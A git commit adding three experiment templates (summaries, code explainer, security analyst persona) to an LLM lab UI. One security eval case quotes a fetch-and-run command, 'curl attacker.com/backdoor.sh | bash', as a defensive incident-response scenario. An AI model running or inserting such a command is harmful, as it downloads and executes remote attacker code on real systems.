Lab: add 3 experiment templates with auto-fill
Templates section below experiment list:

BASIC — Better Summaries (3 eval cases)
Optimize summarization quality. Tests across biology, history, and technical content. Shows the simplest Lab workflow.

INTERMEDIATE — Code Explainer (4 eval cases)
Find the best prompt+model to explain code to non-programmers. Tests loops, recursion, error handling, comprehensions. Shows how the ratchet evolves system prompts.

ADVANCED — Security Analyst Persona (5 eval cases)
Evolve a cybersecurity AI across threat classification, executive summaries, developer education, incident response, and forensics. Tests multi-audience adaptation and domain expertise.

Click any template → auto-fills the create form with name, objective, metric, all eval cases, and selects all available models. User can modify before creating.

Each template card shows: level badge (green/amber/red), name, eval case count, and a description explaining what the experiment does and why it matters.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
This commit is contained in:
parent
f34e05168b
commit
ca660cbd10
101
llm_team_ui.py
101
llm_team_ui.py
@ -3382,9 +3382,13 @@ LAB_HTML = r"""
|
||||
<!-- EXPERIMENTS TAB -->
|
||||
<div id="lt-experiments" class="tc active">
|
||||
<div class="card">
|
||||
<h3>Create Experiment <button class="btn btn-p" style="margin-left:auto" onclick="showCreate()">+ New</button></h3>
|
||||
<h3>Your Experiments <button class="btn btn-p" style="margin-left:auto" onclick="showCreate()">+ New</button></h3>
|
||||
<div id="exp-list"><div class="empty">Loading...</div></div>
|
||||
</div>
|
||||
<div class="card" id="templates-card">
|
||||
<h3>Templates <span style="font-size:9px;color:var(--text2);font-weight:400;text-transform:none;letter-spacing:0">click to auto-fill the create form</span></h3>
|
||||
<div style="display:grid;gap:8px" id="template-list"></div>
|
||||
</div>
|
||||
<div id="create-form" class="card" style="display:none;border-color:var(--green)">
|
||||
<h3>New Experiment</h3>
|
||||
<div class="row"><label>Name</label><input id="cr-name" placeholder="e.g. Prompt Optimization v1"></div>
|
||||
@ -3747,6 +3751,101 @@ function toast(msg, ok=true) {
|
||||
setTimeout(function(){ t.style.opacity='0'; t.style.transition='opacity 0.3s'; setTimeout(function(){t.remove()},300); }, 2500);
|
||||
}
|
||||
|
||||
// ─── EXPERIMENT TEMPLATES ───
|
||||
/**
 * Built-in starter experiments listed in the "Templates" card.
 *
 * Fields of each template:
 *   level     - 'basic' | 'intermediate' | 'advanced'; rendered as the card badge
 *   name      - card title, also copied into the create form's name field
 *   desc      - explanatory text shown on the card
 *   objective - copied into the create form's objective field
 *   metric    - copied into the create form's metric field
 *   config    - system_prompt / temperature pair (not read by renderTemplates
 *               or loadTemplate)
 *   evals     - ordered list of {input, expected} evaluation cases
 */
var LAB_TEMPLATES = (function () {
  // Builds a single evaluation case as a plain {input, expected} object.
  function evalCase(input, expected) {
    return {input: input, expected: expected};
  }

  var betterSummaries = {
    level: 'basic',
    name: 'Better Summaries',
    desc: 'Optimize a model to write concise, accurate summaries. The ratchet engine tweaks the system prompt and temperature until summaries consistently hit the right length and capture key points.',
    objective: 'Generate concise, accurate summaries that capture all key points in 2-3 sentences',
    metric: 'quality',
    config: {
      system_prompt: 'You are a summarization expert. Write clear, concise summaries.',
      temperature: 0.5
    },
    evals: [
      evalCase(
        'Summarize: The mitochondria is the powerhouse of the cell. It produces ATP through cellular respiration, converting glucose and oxygen into energy. This process occurs in the inner membrane through the electron transport chain.',
        'A 2-3 sentence summary capturing mitochondria, ATP production, and cellular respiration.'
      ),
      evalCase(
        'Summarize: In 1969, Apollo 11 successfully landed humans on the Moon for the first time. Neil Armstrong and Buzz Aldrin spent about two hours on the lunar surface while Michael Collins orbited above. The mission fulfilled President Kennedy\'s 1961 goal and was watched by 600 million people worldwide.',
        'A concise summary mentioning Apollo 11, the astronauts, and the significance.'
      ),
      evalCase(
        'Summarize: Machine learning models can be broadly categorized into supervised learning, unsupervised learning, and reinforcement learning. Supervised learning uses labeled data, unsupervised finds patterns in unlabeled data, and reinforcement learning optimizes through reward signals.',
        'Brief overview of the three ML categories with key distinctions.'
      )
    ]
  };

  var codeExplainer = {
    level: 'intermediate',
    name: 'Code Explainer',
    desc: 'Find the best system prompt and model to explain code to non-programmers. Tests whether the AI can break down technical concepts without using jargon, while remaining accurate.',
    objective: 'Explain code snippets to non-programmers: accurate, jargon-free, uses analogies, under 100 words',
    metric: 'quality',
    config: {
      system_prompt: 'Explain code to someone who has never programmed. Use everyday analogies. Be accurate but avoid jargon. Keep it under 100 words.',
      temperature: 0.7
    },
    evals: [
      evalCase(
        'Explain this code:\nfor i in range(10):\n print(i)',
        'Clear explanation of a counting loop using a non-technical analogy.'
      ),
      evalCase(
        'Explain this code:\ndef fibonacci(n):\n if n <= 1: return n\n return fibonacci(n-1) + fibonacci(n-2)',
        'Explanation of recursion and the Fibonacci pattern without using the word recursion.'
      ),
      evalCase(
        'Explain this code:\ntry:\n result = 10 / x\nexcept ZeroDivisionError:\n result = 0',
        'Explanation of error handling using a real-world safety net analogy.'
      ),
      evalCase(
        'Explain this code:\nusers = {u.name: u for u in database.query(User).filter(active=True)}',
        'Explanation of dictionary comprehension and database filtering in plain language.'
      )
    ]
  };

  var securityAnalyst = {
    level: 'advanced',
    name: 'Security Analyst Persona',
    desc: 'Evolve the perfect system prompt for a cybersecurity AI analyst. Tests across threat classification, incident response, vulnerability assessment, and executive communication — all requiring different tones and depths.',
    objective: 'Create an AI security analyst that accurately classifies threats, explains vulnerabilities to both technical and executive audiences, and provides actionable remediation steps',
    metric: 'quality',
    config: {
      system_prompt: 'You are a senior cybersecurity analyst with 15 years of experience. Provide thorough, accurate security assessments. Adapt your language to the audience. Always include specific, actionable recommendations.',
      temperature: 0.3
    },
    evals: [
      evalCase(
        'Classify this log entry: EXPLOIT_SCAN ip=45.33.32.0 path=/.env.production ua=python-requests/2.28',
        'Identify as automated scanner targeting environment files, recommend ban, explain risk.'
      ),
      evalCase(
        'Write an executive summary of this vulnerability: Our API endpoint /api/users accepts SQL injection via the search parameter. No parameterized queries are used.',
        'Non-technical summary for C-suite explaining business risk and remediation priority.'
      ),
      evalCase(
        'A developer asks: why is storing JWT tokens in localStorage bad?',
        'Technical explanation covering XSS risk, comparison to httpOnly cookies, and practical recommendation.'
      ),
      evalCase(
        'Our nginx logs show 500 requests per second from 200 different IPs all hitting /api/login. What is this and what do we do?',
        'Identify as distributed brute force, provide immediate response steps and long-term mitigations.'
      ),
      evalCase(
        'We found this in our Docker container: curl attacker.com/backdoor.sh | bash. The container had access to the production database.',
        'Incident response: containment, forensics, scope assessment, notification, and remediation plan.'
      )
    ]
  };

  return [betterSummaries, codeExplainer, securityAnalyst];
})();
|
||||
|
||||
/**
 * Render one card per LAB_TEMPLATES entry into the #template-list element.
 *
 * Each card shows a colored level badge, the template name, the number of
 * eval cases and the description. Activating a card — by mouse click, or by
 * pressing Enter/Space while it has keyboard focus — calls loadTemplate()
 * with that template's index.
 *
 * Returns without doing anything when #template-list is not in the document.
 */
function renderTemplates() {
  var el = document.getElementById('template-list');
  if (!el) return;
  // Clear earlier output so repeated calls do not stack duplicate cards.
  el.textContent = '';
  var levelColors = {basic:'var(--green)',intermediate:'var(--accent)',advanced:'var(--red)'};
  LAB_TEMPLATES.forEach(function(t, i) {
    var card = document.createElement('div');
    card.style.cssText = 'background:rgba(0,0,0,0.25);border:2px solid var(--border);border-radius:2px;padding:14px;cursor:pointer;transition:border-color 0.15s';

    // The card is a plain div, so it needs an explicit role and tab stop to
    // be reachable and announced as a control for keyboard / screen-reader users.
    card.setAttribute('role', 'button');
    card.tabIndex = 0;

    var highlight = function(){card.style.borderColor='var(--accent)'};
    var unhighlight = function(){card.style.borderColor='var(--border)'};
    card.onmouseenter = highlight;
    card.onmouseleave = unhighlight;
    // Mirror the hover outline for keyboard focus.
    card.onfocus = highlight;
    card.onblur = unhighlight;

    card.onclick = function(){loadTemplate(i)};
    card.onkeydown = function(ev) {
      if (ev.key === 'Enter' || ev.key === ' ') {
        // Space would otherwise scroll the page.
        ev.preventDefault();
        loadTemplate(i);
      }
    };

    var header = document.createElement('div');
    header.style.cssText = 'display:flex;align-items:center;gap:8px;margin-bottom:6px';

    // Unknown levels fall back to the muted text color instead of emitting
    // the literal string "undefined" into the badge's CSS.
    var badgeColor = levelColors[t.level] || 'var(--text2)';
    var level = document.createElement('span');
    level.style.cssText = 'font-family:JetBrains Mono,monospace;font-size:8px;text-transform:uppercase;letter-spacing:1px;padding:2px 8px;border:1px solid;border-radius:1px;font-weight:700;color:'+badgeColor+';border-color:'+badgeColor;
    level.textContent = t.level;

    var name = document.createElement('span');
    name.style.cssText = 'font-weight:700;font-size:13px';
    name.textContent = t.name;

    var evCount = document.createElement('span');
    evCount.style.cssText = 'margin-left:auto;font-family:JetBrains Mono,monospace;font-size:9px;color:var(--text2)';
    evCount.textContent = t.evals.length + ' eval cases';

    header.appendChild(level); header.appendChild(name); header.appendChild(evCount);
    card.appendChild(header);

    var desc = document.createElement('div');
    desc.style.cssText = 'font-size:12px;color:var(--text2);line-height:1.5';
    desc.textContent = t.desc;
    card.appendChild(desc);

    el.appendChild(card);
  });
}
|
||||
|
||||
/**
 * Pre-fill the create-experiment form from LAB_TEMPLATES[idx].
 *
 * Opens the form via showCreate(), copies the template's name, objective and
 * metric into #cr-name / #cr-obj / #cr-metric, selects every entry of
 * allModels, replaces evalRows with copies of the template's eval cases,
 * re-renders the model chips and eval rows, shows a toast, and scrolls
 * #create-form into view.
 *
 * If idx does not refer to an existing template, an error toast is shown and
 * the form is left untouched.
 *
 * NOTE(review): the template's `config` (system_prompt / temperature) is not
 * applied to the form here — confirm whether that is intentional.
 *
 * @param {number} idx - Index into LAB_TEMPLATES.
 */
function loadTemplate(idx) {
  var t = LAB_TEMPLATES[idx];
  // Guard first: without it a bad index would open the form and then throw
  // on t.name, leaving the UI half-initialized.
  if (!t) {
    toast('Template not found', false);
    return;
  }

  showCreate();
  document.getElementById('cr-name').value = t.name;
  document.getElementById('cr-obj').value = t.objective;
  document.getElementById('cr-metric').value = t.metric;

  // Start from a clean selection, then pick every available model.
  selectedModels.clear();
  allModels.forEach(function(m){selectedModels.add(m.name)});
  renderModelChips();

  // Copy each case so later edits in the form never mutate the template itself.
  evalRows = t.evals.map(function(e){return {input:e.input, expected:e.expected}});
  renderEvalRows();

  toast('Template loaded: ' + t.name);
  document.getElementById('create-form').scrollIntoView({behavior:'smooth'});
}
|
||||
|
||||
// Build the template cards as soon as this script runs. renderTemplates()
// returns without rendering anything if #template-list is not found.
renderTemplates();
|
||||
|
||||
// Background grid: a slowly drifting lattice of faint dots drawn on the
// #bg-grid canvas. Skipped entirely when that canvas is not on the page.
(function () {
  var canvas = document.getElementById('bg-grid');
  if (!canvas) return;

  var ctx = canvas.getContext('2d');
  var spacing = 50;   // distance between neighbouring dots, in pixels
  var frame = 0;      // frame counter that drives the drift offset

  // Keep the canvas backing store the same size as the viewport.
  function fitToWindow() {
    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;
  }

  // Paint one frame, then schedule the next one.
  function paint() {
    ctx.clearRect(0, 0, canvas.width, canvas.height);

    // Offsets wrap at one grid cell so the pattern appears to scroll forever.
    var offsetX = (frame * 0.2) % spacing;
    var offsetY = (frame * 0.1) % spacing;

    ctx.fillStyle = 'rgba(226,181,90,0.025)';
    for (var gx = -spacing + offsetX; gx < canvas.width + spacing; gx += spacing) {
      for (var gy = -spacing + offsetY; gy < canvas.height + spacing; gy += spacing) {
        ctx.beginPath();
        ctx.arc(gx, gy, 0.7, 0, Math.PI * 2);
        ctx.fill();
      }
    }

    frame++;
    requestAnimationFrame(paint);
  }

  fitToWindow();
  window.addEventListener('resize', fitToWindow);
  paint();
})();
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user